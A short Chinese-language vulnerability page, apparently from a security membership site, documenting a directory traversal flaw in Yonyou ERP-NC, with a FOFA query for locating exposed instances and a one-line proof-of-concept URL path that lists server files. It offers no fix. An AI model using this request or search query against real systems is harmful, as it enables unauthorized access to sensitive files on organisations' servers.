用友ERP-NC_目录遍历漏洞-棉花糖会员站

# 用友ERP-NC 目录遍历漏洞

## 漏洞描述

用友ERP-NC 存在目录遍历漏洞，攻击者可以通过目录遍历获取敏感文件信息

## 漏洞影响

> [!NOTE]
>
> 用友ERP-NC

## FOFA

> [!NOTE]
>
> app=”用友-UFIDA-NC”

## 漏洞复现

POC为

“`
/NCFindWeb?service=IPreAlertConfigService&filename=
“`

![](/static/qingy/用友ERP-NC_目录遍历漏洞/img/1.png)

查看 ncwslogin.jsp 文件

![](/static/qingy/用友ERP-NC_目录遍历漏洞/img/2.png)

## Goby & POC

> [!NOTE]
>
> YongYou ERP-NC directory traversal

![](/static/qingy/用友ERP-NC_目录遍历漏洞/img/3.png)

文章版权归作者所有，未经允许请勿转载。

THE END

用友ERP-NC_目录遍历漏洞